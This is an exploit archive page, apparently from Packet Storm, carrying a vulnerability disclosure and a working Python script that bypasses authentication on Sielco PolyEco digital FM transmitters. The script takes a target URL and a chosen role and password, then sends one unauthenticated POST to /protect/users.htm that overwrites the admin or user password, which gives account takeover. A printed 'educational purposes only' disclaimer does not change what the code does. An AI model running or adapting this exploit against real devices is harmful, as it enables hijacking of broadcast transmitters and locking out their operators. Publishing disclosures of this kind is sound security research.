what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Sielco PolyEco Digital FM Transmitter 2.0.6 Authentication Bypass

Sielco PolyEco Digital FM Transmitter 2.0.6 Authentication Bypass
Posted Apr 12, 2023
Authored by LiquidWorm | Site zeroscience.mk

Sielco PolyEco Digital FM Transmitter version 2.0.6 suffers from an authentication bypass vulnerability.

tags | exploit, bypass
SHA-256 | 04fe7d8ff6572fa3612a369b0c0a33163c016a620b5ff6ab9e58d326db1f5cf8

Sielco PolyEco Digital FM Transmitter 2.0.6 Authentication Bypass

Change Mirror Download
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# Sielco PolyEco Digital FM Transmitter 2.0.6 Authentication Bypass Exploit
#
#
# Vendor: Sielco S.r.l
# Product web page: https://www.sielco.org
# Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19
# PolyEco1000 CPU:1.9.4 FPGA:10.19
# PolyEco1000 CPU:1.9.3 FPGA:10.19
# PolyEco500 CPU:1.7.0 FPGA:10.16
# PolyEco300 CPU:2.0.2 FPGA:10.19
# PolyEco300 CPU:2.0.0 FPGA:10.19
#
# Summary: PolyEco is the innovative family of high-end digital
# FM transmitters of Sielco. They are especially suited as high
# performance power system exciters or compact low-mid power
# transmitters. The same cabinet may in fact be fitted with 50,
# 100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,
# 1000).
#
# All features can be controlled via the large touch-screen display
# 4.3" or remotely. Many advanced features are inside by default
# in the basic version such as: stereo and RDS encoder, audio
# change-over, remote-control via LAN and SNMP, "FFT" spectral
# analysis of the audio sources, SFN synchronization and much more.
#
# Desc: The application suffers from an authentication bypass and
# account takeover/lockout vulnerability that can be triggered by
# directly calling the users object and effectively modifying the
# password of the two constants user/role (user/admin). This can
# be exploited by an unauthenticated adversary by issuing a single
# POST request to the vulnerable endpoint and gain unauthorized
# access to the affected device with administrative privileges.
#
# Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Macedonian Information Security Research and Development Laboratory
# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
#
#
# Advisory ID: ZSL-2023-5769
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5769.php
#
#
# 26.01.2023
#
#


import requests
print( '''
.- _ _ -.
/ / \\ \\
( ( (` (-o-) `) ) )
\ \_ ` -+- ` _/ /
`- -+- -`
-+-
-+-
-+-
-+-
-+-
-+-
/ \\
*****************************************************
! Sielco PolyEco Authentication Bypass Script !
*****************************************************

Please note that this script is for educational and
ethical purposes only. Using it for unauthorized
access or malicious activities is strictly prohibited
and can have serious legal and ethical consequences.
The responsibility of using this script in a lawful
and ethical manner lies solely with the user. The
author or creator of this script shall not be held
responsible for any unlawful or unethical activities
performed by the users.
''' )
url = input( ' Enter the URL (e.g. http://host:8090): ' )
if not 'http' in url :
url = 'http://{}'.format( url )
user = input( ' Enter the desired role (e.g. user or admin): ')
if user not in [ 'user', 'admin' ] :
exit( ' Only \'user\' or \'admin\' please.' )
password = input( ' Enter the desired password: ' )
end = '/protect/users.htm'
payload = {}
if user == "user" :
payload[ 'pwd_admin' ] = ''
payload[ 'pwd_user' ] = password
elif user == 'admin' :
payload[ 'pwd_admin' ] = password
payload[ 'pwd_user' ] = ''
r = requests.post( url + end, data = payload )
if r.status_code == 200 :
print( '\n MSG: OK.' )
else:
print( '\n MSG: ERROR!' )
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    18 Files
  • 14
    Aug 14th
    50 Files
  • 15
    Aug 15th
    33 Files
  • 16
    Aug 16th
    23 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    43 Files
  • 20
    Aug 20th
    29 Files
  • 21
    Aug 21st
    42 Files
  • 22
    Aug 22nd
    26 Files
  • 23
    Aug 23rd
    25 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    21 Files
  • 27
    Aug 27th
    28 Files
  • 28
    Aug 28th
    15 Files
  • 29
    Aug 29th
    41 Files
  • 30
    Aug 30th
    13 Files
  • 31
    Aug 31st
    467 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close